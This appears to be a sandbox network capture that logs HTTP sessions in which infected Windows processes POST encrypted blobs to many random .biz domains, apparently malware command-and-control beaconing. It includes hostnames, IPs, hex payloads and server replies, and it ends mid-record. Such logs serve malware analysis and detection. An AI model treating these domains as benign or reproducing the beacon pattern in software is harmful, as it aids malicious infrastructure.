Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
118 | 192.168.2.4 | 50158 | 18.141.10.107 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:31.567681074 CEST | 345 | OUT | POST /sq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: warkcdu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.567681074 CEST778OUTData Raw: 08 d1 b6 f7 56 0a e6 15 fe 02 00 00 04 4a b2 f9 c7 25 eb 1f 84 18 44 ce 15 5c 7f c6 60 03 ce 9a 66 94 03 78 ec 34 2a bc 3e 0f 02 af 54 09 00 e8 64 5e bf 9f c4 44 58 5e 41 2f 92 9e 5c 0e f3 71 85 e9 08 a9 2d bc 0c 35 cd b1 57 be f8 9f bb eb 44 42
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: VJ%D\`fx4*>Td^DX^A/\q-5WDBQ]+NlEQJC@;GQ#2*]cA7cwYj/54WzwAQHr2kPGr5/D8:ntAzj4)NF#?_
Oct 8, 2024 15:29:32.915174961 CEST | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0b1ce7f834fb90a74be22fe2be4d60ef|8.46.123.33|1728394172|1728394172|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
119 | 192.168.2.4 | 50159 | 35.164.78.200 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:31.894870043 CEST | 354 | OUT | POST /ejbrogxxii HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tnevuluw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:31.894889116 CEST | 786 | OUT | Data Raw: a4 83 ee c4 6b ae 30 f6 06 03 00 00 f6 6e b3 3a 8e a4 a7 22 e9 77 bc bf 38 96 87 cb bc 6c de 6c fb b1 e9 b3 6a 12 ad 0d d5 15 95 6b 03 5c c0 05 34 df 31 60 40 91 25 b6 e2 55 f4 77 45 43 31 20 ed 19 3c ab e5 d3 98 0e c1 9f fd 4a 4c 48 be 96 13 29
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: k0n:"w8lljk\41`@%UwEC1 <JLH){vu*A)0XW9tM^.#Jg'qE\gv.^imI{GSns|J#uh_bu<}tyWLx^*n\4qY&@]{>2m"PLjd<no
Oct 8, 2024 15:29:32.636181116 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7c754c4fb92758001e74183ebb896ac7|8.46.123.33|1728394172|1728394172|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
120 | 192.168.2.4 | 50160 | 18.141.10.107 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:32.670897961 CEST | 353 | OUT | POST /efgvahmdqrw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: whjovd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:32.670928955 CEST | 786 | OUT | Data Raw: ca 4f 4f d1 39 eb 00 6f 06 03 00 00 d0 42 66 75 4e 34 08 0c 89 bc 27 e7 96 cc 09 ce 9d 9d 2c da 50 79 cc 1a 9c 32 11 20 4b af f0 58 e5 43 60 7b 73 ec 77 8c f3 6d 65 be 47 2e 38 e9 91 23 9d 40 ab 28 4f 95 57 b1 8d d5 a3 cc 38 bb 24 7e c8 46 1b cb
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: OO9oBfuN4',Py2 KXC`{swmeG.8#@(OW8$~F3LE/m~++dzWd1Sz0/ fpWIz6fC+"JA^tchRsd(2"m6G n$^9wXxP~qzY`ygzk^-I
Oct 8, 2024 15:29:34.017112017 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e842ab3c0a071a3070b9ffd9764c0659|8.46.123.33|1728394173|1728394173|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              121192.168.2.45016113.251.16.150802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.589046001 CEST354OUTPOST /fbtooofknamad HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:29:33.589068890 CEST | 778 | OUT | Data Raw: 0a 20 aa da 4f 94 c6 63 fe 02 00 00 7b 08 d2 63 52 8d 38 67 4a d4 d3 c9 42 14 c4 ea 2f 09 f1 4b b6 27 b1 f7 57 ed 01 fe de ad a9 fd 6c d2 10 49 e9 7a c6 77 30 f1 7b 82 cb 3e 3a e6 24 30 88 26 4c 14 ab 1e 3e d1 6f dd 58 1c c5 cd 17 7a 75 94 cf 5b
Oct 8, 2024 15:29:34.920583010 CEST | 407 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=5c803470f93b1fb698239cc8f490846b|8.46.123.33|1728394174|1728394174|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
122 | 192.168.2.4 | 50163 | 208.100.26.245 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:34.048300982 CEST | 354 | OUT | POST /jftqxekje HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:29:34.048342943 CEST | 786 | OUT | Data Raw: b8 05 42 0b 5e cf f0 22 06 03 00 00 9d 68 04 90 86 43 0f 9d 66 cd d1 a8 3b 2e 8e 17 87 37 a8 dd 51 ab 6b f8 36 09 c2 ae e9 a3 32 35 42 3c fa 2f 1e dd b0 99 af 0d 35 34 f8 af 5d b5 a8 51 51 d7 76 cb bf a7 48 88 ad ca ec 81 e1 0f b6 ab 80 cd 76 d4
Oct 8, 2024 15:29:34.555800915 CEST | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 8, 2024 15:29:34.719012022 CEST | 353 | OUT | POST /ecrhfjlr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:29:34.719044924 CEST | 786 | OUT | Data Raw: 97 18 6b 20 62 28 28 63 06 03 00 00 bc c2 d3 43 d6 50 d2 1d 9a 3a 54 e3 08 d4 10 43 6d 0a 8a f0 70 db 35 aa 1f 73 89 f5 54 88 da bc e2 d3 52 63 8d 6a ea ae 06 3a a1 45 e3 2a 7c 80 0c a1 02 38 a9 8d 1e 37 4a 38 58 f0 7f 4d ed 11 5a 11 40 d0 b8 00
Oct 8, 2024 15:29:34.835093021 CEST | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
123 | 192.168.2.4 | 50164 | 44.221.84.105 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:34.861241102 CEST | 346 | OUT | POST /jec HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: reczwga.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:34.861279011 CEST | 786 | OUT | Data Raw: bc 37 27 61 03 dd 00 b1 06 03 00 00 a2 2a 99 68 39 f4 1a 39 36 40 74 e9 ac 2a b8 54 5b 20 87 b5 ce 04 ff da a3 12 4a 2c c6 0c 85 c6 3b 69 7d 05 59 21 7b ad 3b 54 6b 32 c7 ce 68 31 07 8a 50 01 eb 9a 98 4c c6 01 e2 75 47 25 c0 d6 c6 22 6e 02 90 69
Oct 8, 2024 15:29:35.317003965 CEST | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d093743da47cd10cb5b4bd98f1651c35|8.46.123.33|1728394175|1728394175|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
124 | 192.168.2.4 | 50165 | 18.208.156.248 | 80 | 2912 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:35.153146982 CEST | 356 | OUT | POST /kuwwkrnberw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jwkoeoqns.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 8, 2024 15:29:35.153321981 CEST | 778 | OUT | Data Raw: 43 66 26 1d 81 af 86 8c fe 02 00 00 03 d5 f7 8c eb 76 6b 97 49 9a ea 26 28 61 b6 f4 c6 52 02 49 8d 7e f5 54 06 c3 43 45 e4 89 23 17 c4 c6 f8 9f 70 17 b1 0d cf b9 5d c8 7f 5f f0 63 04 42 65 4a 44 96 25 a9 30 16 02 4f 5e b0 7c c7 3c 37 5c 19 d9 02
Oct 8, 2024 15:29:35.613483906 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=aaa4fd561bc86d9f906226549b78b993|8.46.123.33|1728394175|1728394175|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
125 | 192.168.2.4 | 50166 | 34.211.97.45 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:35.346894979 CEST | 356 | OUT | POST /iwihrntolwnlxj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bghjpy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:35.346998930 CEST | 786 | OUT | Data Raw: 77 4c 3c 91 d6 2d e7 ea 06 03 00 00 44 ec b3 ab 99 3d 8b e7 d8 7d 17 14 cb 07 11 89 5f 49 ae 28 d4 c3 0c d2 98 00 df ef 45 d3 e5 5a 5d e6 9e 0e fe 0e 96 58 73 c1 5f 90 36 30 7e 25 b4 e6 03 f6 46 5f 81 21 bb 13 3b 44 94 6c 0f 43 6f 2a 0c ee a3 b9
Oct 8, 2024 15:29:36.072403908 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ec53985445d9a94b0d378fa30f7e07de|8.46.123.33|1728394175|1728394175|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
126 | 192.168.2.4 | 50167 | 44.213.104.86 | 80 | 2912 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:35.864891052 CEST | 351 | OUT | POST /quoefwkpxb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xccjj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 8, 2024 15:29:35.864933014 CEST | 778 | OUT | Data Raw: ec 7f 71 04 c2 15 a2 da fe 02 00 00 97 c3 95 18 45 3f db 54 7b 37 53 63 b8 dc 06 47 9e 7c 13 88 11 c4 4e f1 98 22 3c 33 bf 40 cc e4 64 8b b3 a1 5e e2 85 e8 50 c4 6b 22 94 2a d8 b8 82 b9 0d e7 eb 95 a8 c6 e5 43 c3 8e 11 48 f4 3f 41 cb 32 ec ae d2
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: qE?T{7ScG|N"<3@d^Pk"*CH?A285Ss^#2Sb-MfDUp;-/Q@K}/MKGH>zGZDA9RJr|qx_Oe?Uq,_VU^g7bFi&b
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.327686071 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=f132d5002d3e918fb348583c68973937|8.46.123.33|1728394176|1728394176|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
127 | 192.168.2.4 | 50169 | 18.208.156.248 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:36.114905119 CEST | 361 | OUT | POST /qwxttwlxqjtrapbn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: damcprvgv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:36.114928961 CEST | 786 | OUT | Data Raw: f5 f9 b7 cd 8b 81 7f 93 06 03 00 00 a2 dd 02 ff e3 88 02 b2 88 71 6c 9d e7 19 03 ed 62 22 13 d0 e7 0f fd e5 5c 8a 2a 7d da 60 b1 9a a9 f3 70 69 56 25 d3 12 61 c7 ad 3d 77 12 71 7b 31 99 e9 a7 de 9d 0a 71 8a 86 14 54 e1 c9 14 de 7a 72 95 6d 5d 11
Data Ascii: qlb"\*}`piV%a=wq{1qTzrm]F0bj!4>`*J3g3%~"Z`^MFm67~UN:)0Na9V9CH"Hx,D 8Nu|p=PEl%/7&?e*C:Shf(--9
Oct 8, 2024 15:29:36.589359045 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=40694a46595ad6a28c7aed5da0b6463d|8.46.123.33|1728394176|1728394176|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
128 | 192.168.2.4 | 50170 | 44.221.84.105 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:36.500425100 CEST | 358 | OUT | POST /gkelppguisaups HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hehckyov.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 8, 2024 15:29:36.500425100 CEST | 778 | OUT | Data Raw: 2d 24 ba 37 f9 37 5c f9 fe 02 00 00 ec a9 09 10 34 ec f9 d3 24 f5 0d 2d c9 f1 8e d5 e7 33 ef be 60 e2 64 d6 ac 30 6b 4e 2f 18 f8 19 8e 0b 6d dd 86 ae 73 2f 6e b5 74 84 92 b3 74 f5 b9 cb b3 85 7e 5c 74 aa 74 8b 28 85 14 4d 0e f4 50 bb d0 fb 98 23
Data Ascii: -$77\4$-3`d0kN/ms/ntt~\tt(MP#2bH4CCDI~4*\1N#}[b6y O8<+]h%5C3z(8Pw]V"j <s_k6?5cVhn G1Ad [&PD
Oct 8, 2024 15:29:36.968970060 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e298ebc88f1160a91a37d81a44e386e5|8.46.123.33|1728394176|1728394176|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              129192.168.2.4501713.254.94.185804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.634922028 CEST355OUTPOST /ldybnpdmgmce HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.634922028 CEST786OUTData Raw: 87 14 21 cf 75 e5 1f c2 06 03 00 00 85 2c 1b 04 70 2d a3 63 34 d4 35 6d 49 44 e4 24 88 c2 e7 37 48 35 c2 da dc b9 a7 ed bc 0a ef 09 b0 fd 61 0a 9d 03 34 90 a0 53 26 2c 05 0b b7 05 e5 db 51 de 86 e8 21 33 8f b5 1e 7d db a2 08 33 77 64 a4 41 a7 a5
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !u,p-c45mID$7H5a4S&,Q!3}3wdAm( m;&e}T51JJYM{}:4u+d96I@bx)z$.@T/B^rIy|ljryyc
Oct 8, 2024 15:29:37.387723923 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=326dadc042134eb79c15014326b6c378|8.46.123.33|1728394177|1728394177|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
130 | 192.168.2.4 | 50172 | 54.244.188.177 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:37.535588980 CEST | 345 | OUT | POST /pkyl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:29:38.256568909 CEST | 407 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
